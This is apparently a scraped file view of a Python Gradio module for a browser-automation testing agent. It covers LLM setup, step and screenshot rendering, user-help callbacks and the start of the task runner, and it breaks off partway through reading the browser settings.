|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""
|
| 2 |
+
🤖 Fagun Browser Automation Testing Agent - Browser Use Agent Tab
|
| 3 |
+
================================================================
|
| 4 |
+
|
| 5 |
+
UI components for running and managing browser automation tasks.
|
| 6 |
+
|
| 7 |
+
Author: Mejbaur Bahar Fagun
|
| 8 |
+
Role: Software Engineer in Test
|
| 9 |
+
LinkedIn: https://www.linkedin.com/in/mejbaur/
|
| 10 |
+
"""
|
| 11 |
+
|
| 12 |
+
import asyncio
|
| 13 |
+
import json
|
| 14 |
+
import logging
|
| 15 |
+
import os
|
| 16 |
+
import uuid
|
| 17 |
+
from typing import Any, AsyncGenerator, Dict, Optional
|
| 18 |
+
|
| 19 |
+
import gradio as gr
|
| 20 |
+
|
| 21 |
+
# from browser_use.agent.service import Agent
|
| 22 |
+
from browser_use.agent.views import (
|
| 23 |
+
AgentHistoryList,
|
| 24 |
+
AgentOutput,
|
| 25 |
+
)
|
| 26 |
+
from browser_use.browser.browser import BrowserConfig
|
| 27 |
+
from browser_use.browser.context import BrowserContext, BrowserContextConfig
|
| 28 |
+
from browser_use.browser.views import BrowserState
|
| 29 |
+
from gradio.components import Component
|
| 30 |
+
from langchain_core.language_models.chat_models import BaseChatModel
|
| 31 |
+
|
| 32 |
+
from src.agent.browser_use.browser_use_agent import BrowserUseAgent
|
| 33 |
+
from src.browser.custom_browser import CustomBrowser
|
| 34 |
+
from src.controller.custom_controller import CustomController
|
| 35 |
+
from src.utils import llm_provider
|
| 36 |
+
from src.webui.webui_manager import WebuiManager
|
| 37 |
+
|
| 38 |
+
logger = logging.getLogger(__name__)
|
| 39 |
+
|
| 40 |
+
|
| 41 |
+
# --- Helper Functions --- (Defined at module level)
|
| 42 |
+
|
| 43 |
+
|
| 44 |
+
async def _initialize_llm(
    provider: Optional[str],
    model_name: Optional[str],
    temperature: float,
    base_url: Optional[str],
    api_key: Optional[str],
    num_ctx: Optional[int] = None,
) -> Optional[BaseChatModel]:
    """Build the chat model for the given provider settings.

    Returns None when provider/model is missing or initialization fails; a
    Gradio warning is surfaced to the user in the failure case.
    """
    # Without both a provider and a model name there is nothing to build.
    if not provider or not model_name:
        logger.info("LLM Provider or Model Name not specified, LLM will be None.")
        return None
    try:
        logger.info(
            f"Initializing LLM: Provider={provider}, Model={model_name}, Temp={temperature}"
        )
        # num_ctx is an Ollama-only knob; every other provider gets None.
        return llm_provider.get_llm_model(
            provider=provider,
            model_name=model_name,
            temperature=temperature,
            base_url=base_url or None,
            api_key=api_key or None,
            num_ctx=num_ctx if provider == "ollama" else None,
        )
    except Exception as e:
        logger.error(f"Failed to initialize LLM: {e}", exc_info=True)
        gr.Warning(
            f"Failed to initialize LLM '{model_name}' for provider '{provider}'. Please check settings. Error: {e}"
        )
        return None
|
| 78 |
+
|
| 79 |
+
|
| 80 |
+
def _get_config_value(
    webui_manager: WebuiManager,
    comp_dict: Dict[gr.components.Component, Any],
    comp_id_suffix: str,
    default: Any = None,
) -> Any:
    """Safely get value from component dictionary using its ID suffix relative to the tab."""
    # Component IDs follow the "tab_name.comp_name" convention. Probe this
    # tab first, then fall back to the two settings tabs, in that order.
    for tab_prefix in ("browser_use_agent", "agent_settings", "browser_settings"):
        try:
            component = webui_manager.get_component_by_id(
                f"{tab_prefix}.{comp_id_suffix}"
            )
        except KeyError:
            continue
        return comp_dict.get(component, default)
    logger.warning(
        f"Component with suffix '{comp_id_suffix}' not found in manager for value lookup."
    )
    return default
|
| 107 |
+
|
| 108 |
+
|
| 109 |
+
def _format_agent_output(model_output: AgentOutput) -> str:
    """Render an AgentOutput as a pretty-printed JSON block for the chatbot."""
    if not model_output:
        return ""
    try:
        # Dump actions first, then state, mirroring the failure semantics of
        # the original implementation if either lacks `model_dump`.
        actions = [
            item.model_dump(exclude_none=True) for item in model_output.action
        ]
        state = model_output.current_state.model_dump(exclude_none=True)
        pretty = json.dumps(
            {"current_state": state, "action": actions},
            indent=4,
            ensure_ascii=False,
        )
        # Wrap in <pre><code> so the chatbot renders it as a code block.
        content = f"<pre><code class='language-json'>{pretty}</code></pre>"
    except AttributeError as ae:
        logger.error(
            f"AttributeError during model dump: {ae}. Check if 'action' or 'current_state' or their items support 'model_dump'."
        )
        content = f"<pre><code>Error: Could not format agent output (AttributeError: {ae}).\nRaw output: {str(model_output)}</code></pre>"
    except Exception as e:
        logger.error(f"Error formatting agent output: {e}", exc_info=True)
        # Fall back to the raw string representation on any other error.
        content = f"<pre><code>Error formatting agent output.\nRaw output:\n{str(model_output)}</code></pre>"
    return content.strip()
|
| 140 |
+
|
| 141 |
+
|
| 142 |
+
# --- Updated Callback Implementation ---
|
| 143 |
+
|
| 144 |
+
|
| 145 |
+
async def _handle_new_step(
    webui_manager: WebuiManager, state: BrowserState, output: AgentOutput, step_num: int
):
    """Callback for each step taken by the agent, including screenshot display."""
    # Defensive: make sure the chat history list exists before appending.
    if not hasattr(webui_manager, "bu_chat_history"):
        logger.error(
            "Attribute 'bu_chat_history' not found in webui_manager! Cannot add chat message."
        )
        webui_manager.bu_chat_history = []

    # The agent reports the upcoming step number; shift to the one just done.
    step_num -= 1
    logger.info(f"Step {step_num} completed.")

    def _render_screenshot() -> str:
        """Build the HTML snippet for this step's screenshot (may be empty)."""
        shot = getattr(state, "screenshot", None)
        if not shot:
            logger.debug(f"No screenshot available for step {step_num}.")
            return ""
        try:
            # Cheap sanity check that the payload looks like base64 data.
            if isinstance(shot, str) and len(shot) > 100:
                img_tag = f'<img src="data:image/jpeg;base64,{shot}" alt="Step {step_num} Screenshot" style="max-width: 800px; max-height: 600px; object-fit:contain;" />'
                return img_tag + "<br/>"
            logger.warning(
                f"Screenshot for step {step_num} seems invalid (type: {type(shot)}, len: {len(shot) if isinstance(shot, str) else 'N/A'})."
            )
            return "**[Invalid screenshot data]**<br/>"
        except Exception as e:
            logger.error(
                f"Error processing or formatting screenshot for step {step_num}: {e}",
                exc_info=True,
            )
            return "**[Error displaying screenshot]**<br/>"

    # Header, optional screenshot (with its own trailing <br/>), then the
    # JSON-formatted model output.
    final_content = (
        f"--- **Step {step_num}** ---"
        + "<br/>"
        + _render_screenshot()
        + _format_agent_output(output)
    )
    webui_manager.bu_chat_history.append(
        {"role": "assistant", "content": final_content.strip()}
    )

    # Yield control briefly so the UI polling loop can pick up the message.
    await asyncio.sleep(0.05)
|
| 209 |
+
|
| 210 |
+
|
| 211 |
+
def _handle_done(webui_manager: WebuiManager, history: AgentHistoryList):
    """Callback when the agent finishes the task (success or failure)."""
    duration = history.total_duration_seconds()
    input_tokens = history.total_input_tokens()
    logger.info(
        f"Agent task finished. Duration: {duration:.2f}s, Tokens: {input_tokens}"
    )

    # Assemble the summary as pieces and join once at the end.
    parts = [
        "**Task Completed**\n",
        f"- Duration: {duration:.2f} seconds\n",
        f"- Total Input Tokens: {input_tokens}\n",
    ]

    final_result = history.final_result()
    if final_result:
        parts.append(f"- Final Result: {final_result}\n")

    errors = history.errors()
    if errors and any(errors):
        parts.append(f"- **Errors:**\n```\n{errors}\n```\n")
    else:
        parts.append("- Status: Success\n")

    webui_manager.bu_chat_history.append(
        {"role": "assistant", "content": "".join(parts)}
    )
|
| 233 |
+
|
| 234 |
+
|
| 235 |
+
async def _ask_assistant_callback(
    webui_manager: WebuiManager, query: str, browser_context: BrowserContext
) -> Dict[str, Any]:
    """Callback triggered by the agent's ask_for_assistant action.

    Posts the agent's question to the chat, then waits (up to one hour) for
    the UI to set ``webui_manager.bu_user_help_response`` and fire
    ``bu_response_event``.

    Returns:
        A dict with a single "response" key holding the user's reply, or a
        timeout/error message for the agent to act on.
    """
    logger.info("Agent requires assistance. Waiting for user input.")

    # BUGFIX: this guard previously checked for "_chat_history", an attribute
    # that is never set on WebuiManager — every other callback in this module
    # (and this function's own body) uses "bu_chat_history" — so help
    # requests always short-circuited with an internal error. Check the
    # attribute that is actually used below.
    if not hasattr(webui_manager, "bu_chat_history"):
        logger.error("Chat history not found in webui_manager during ask_assistant!")
        return {"response": "Internal Error: Cannot display help request."}

    webui_manager.bu_chat_history.append(
        {
            "role": "assistant",
            "content": f"**Need Help:** {query}\nPlease provide information or perform the required action in the browser, then type your response/confirmation below and click 'Submit Response'.",
        }
    )

    # State shared with the UI: the submit handler stores the user's text in
    # bu_user_help_response and sets bu_response_event to wake us up.
    webui_manager.bu_response_event = asyncio.Event()
    webui_manager.bu_user_help_response = None  # Reset previous response

    try:
        logger.info("Waiting for user response event...")
        await asyncio.wait_for(
            webui_manager.bu_response_event.wait(), timeout=3600.0
        )  # Long timeout
        logger.info("User response event received.")
    except asyncio.TimeoutError:
        logger.warning("Timeout waiting for user assistance.")
        webui_manager.bu_chat_history.append(
            {
                "role": "assistant",
                "content": "**Timeout:** No response received. Trying to proceed.",
            }
        )
        webui_manager.bu_response_event = None  # Clear the event
        return {"response": "Timeout: User did not respond."}  # Inform the agent

    response = webui_manager.bu_user_help_response
    webui_manager.bu_chat_history.append(
        {"role": "user", "content": response}
    )  # Show user response in chat
    webui_manager.bu_response_event = (
        None  # Clear the event for the next potential request
    )
    return {"response": response}
|
| 281 |
+
|
| 282 |
+
|
| 283 |
+
# --- Core Agent Execution Logic --- (Needs access to webui_manager)
|
| 284 |
+
|
| 285 |
+
|
| 286 |
+
async def run_agent_task(
|
| 287 |
+
webui_manager: WebuiManager, components: Dict[gr.components.Component, Any]
|
| 288 |
+
) -> AsyncGenerator[Dict[gr.components.Component, Any], None]:
|
| 289 |
+
"""Handles the entire lifecycle of initializing and running the agent."""
|
| 290 |
+
|
| 291 |
+
# --- Get Components ---
|
| 292 |
+
# Need handles to specific UI components to update them
|
| 293 |
+
user_input_comp = webui_manager.get_component_by_id("browser_use_agent.user_input")
|
| 294 |
+
run_button_comp = webui_manager.get_component_by_id("browser_use_agent.run_button")
|
| 295 |
+
stop_button_comp = webui_manager.get_component_by_id(
|
| 296 |
+
"browser_use_agent.stop_button"
|
| 297 |
+
)
|
| 298 |
+
pause_resume_button_comp = webui_manager.get_component_by_id(
|
| 299 |
+
"browser_use_agent.pause_resume_button"
|
| 300 |
+
)
|
| 301 |
+
clear_button_comp = webui_manager.get_component_by_id(
|
| 302 |
+
"browser_use_agent.clear_button"
|
| 303 |
+
)
|
| 304 |
+
chatbot_comp = webui_manager.get_component_by_id("browser_use_agent.chatbot")
|
| 305 |
+
history_file_comp = webui_manager.get_component_by_id(
|
| 306 |
+
"browser_use_agent.agent_history_file"
|
| 307 |
+
)
|
| 308 |
+
gif_comp = webui_manager.get_component_by_id("browser_use_agent.recording_gif")
|
| 309 |
+
browser_view_comp = webui_manager.get_component_by_id(
|
| 310 |
+
"browser_use_agent.browser_view"
|
| 311 |
+
)
|
| 312 |
+
|
| 313 |
+
# --- 1. Get Task and Initial UI Update ---
|
| 314 |
+
task = components.get(user_input_comp, "").strip()
|
| 315 |
+
if not task:
|
| 316 |
+
gr.Warning("Please enter a task.")
|
| 317 |
+
yield {run_button_comp: gr.update(interactive=True)}
|
| 318 |
+
return
|
| 319 |
+
|
| 320 |
+
# Set running state indirectly via _current_task
|
| 321 |
+
webui_manager.bu_chat_history.append({"role": "user", "content": task})
|
| 322 |
+
|
| 323 |
+
yield {
|
| 324 |
+
user_input_comp: gr.Textbox(
|
| 325 |
+
value="", interactive=False, placeholder="Agent is running..."
|
| 326 |
+
),
|
| 327 |
+
run_button_comp: gr.Button(value="⏳ Running...", interactive=False),
|
| 328 |
+
stop_button_comp: gr.Button(interactive=True),
|
| 329 |
+
pause_resume_button_comp: gr.Button(value="⏸️ Pause", interactive=True),
|
| 330 |
+
clear_button_comp: gr.Button(interactive=False),
|
| 331 |
+
chatbot_comp: gr.update(value=webui_manager.bu_chat_history),
|
| 332 |
+
history_file_comp: gr.update(value=None),
|
| 333 |
+
gif_comp: gr.update(value=None),
|
| 334 |
+
}
|
| 335 |
+
|
| 336 |
+
# --- Agent Settings ---
|
| 337 |
+
# Access settings values via components dict, getting IDs from webui_manager
|
| 338 |
+
def get_setting(key, default=None):
|
| 339 |
+
comp = webui_manager.id_to_component.get(f"agent_settings.{key}")
|
| 340 |
+
return components.get(comp, default) if comp else default
|
| 341 |
+
|
| 342 |
+
override_system_prompt = get_setting("override_system_prompt") or None
|
| 343 |
+
extend_system_prompt = get_setting("extend_system_prompt") or None
|
| 344 |
+
llm_provider_name = get_setting(
|
| 345 |
+
"llm_provider", None
|
| 346 |
+
) # Default to None if not found
|
| 347 |
+
llm_model_name = get_setting("llm_model_name", None)
|
| 348 |
+
llm_temperature = get_setting("llm_temperature", 0.6)
|
| 349 |
+
use_vision = get_setting("use_vision", True)
|
| 350 |
+
ollama_num_ctx = get_setting("ollama_num_ctx", 16000)
|
| 351 |
+
llm_base_url = get_setting("llm_base_url") or None
|
| 352 |
+
llm_api_key = get_setting("llm_api_key") or None
|
| 353 |
+
max_steps = get_setting("max_steps", 100)
|
| 354 |
+
max_actions = get_setting("max_actions", 10)
|
| 355 |
+
max_input_tokens = get_setting("max_input_tokens", 128000)
|
| 356 |
+
tool_calling_str = get_setting("tool_calling_method", "auto")
|
| 357 |
+
tool_calling_method = tool_calling_str if tool_calling_str != "None" else None
|
| 358 |
+
mcp_server_config_comp = webui_manager.id_to_component.get(
|
| 359 |
+
"agent_settings.mcp_server_config"
|
| 360 |
+
)
|
| 361 |
+
mcp_server_config_str = (
|
| 362 |
+
components.get(mcp_server_config_comp) if mcp_server_config_comp else None
|
| 363 |
+
)
|
| 364 |
+
mcp_server_config = (
|
| 365 |
+
json.loads(mcp_server_config_str) if mcp_server_config_str else None
|
| 366 |
+
)
|
| 367 |
+
|
| 368 |
+
# Planner LLM Settings (Optional)
|
| 369 |
+
planner_llm_provider_name = get_setting("planner_llm_provider") or None
|
| 370 |
+
planner_llm = None
|
| 371 |
+
planner_use_vision = False
|
| 372 |
+
if planner_llm_provider_name:
|
| 373 |
+
planner_llm_model_name = get_setting("planner_llm_model_name")
|
| 374 |
+
planner_llm_temperature = get_setting("planner_llm_temperature", 0.6)
|
| 375 |
+
planner_ollama_num_ctx = get_setting("planner_ollama_num_ctx", 16000)
|
| 376 |
+
planner_llm_base_url = get_setting("planner_llm_base_url") or None
|
| 377 |
+
planner_llm_api_key = get_setting("planner_llm_api_key") or None
|
| 378 |
+
planner_use_vision = get_setting("planner_use_vision", False)
|
| 379 |
+
|
| 380 |
+
planner_llm = await _initialize_llm(
|
| 381 |
+
planner_llm_provider_name,
|
| 382 |
+
planner_llm_model_name,
|
| 383 |
+
planner_llm_temperature,
|
| 384 |
+
planner_llm_base_url,
|
| 385 |
+
planner_llm_api_key,
|
| 386 |
+
planner_ollama_num_ctx if planner_llm_provider_name == "ollama" else None,
|
| 387 |
+
)
|
| 388 |
+
|
| 389 |
+
# --- Browser Settings ---
|
| 390 |
+
def get_browser_setting(key, default=None):
|
| 391 |
+
comp = webui_manager.id_to_component.get(f"browser_settings.{key}")
|
| 392 |
+
return components.get(comp, default) if comp else default
|
| 393 |
+
|
| 394 |
+
browser_binary_path = get_browser_setting("browser_binary_path") or None
|
| 395 |
+
browser_user_data_dir = get_browser_setting("browser_user_data_dir") or None
|
| 396 |
+
use_own_browser = get_browser_setting(
|
| 397 |
+
"use_own_browser", False
|
| 398 |
+
) # Logic handled by CDP/WSS presence
|
| 399 |
+
keep_browser_open = get_browser_setting("keep_browser_open", False)
|
| 400 |
+
headless = get_browser_setting("headless", False)
|
| 401 |
+
disable_security = get_browser_setting("disable_security", False)
|
| 402 |
+
window_w = int(get_browser_setting("window_w", 1280))
|
| 403 |
+
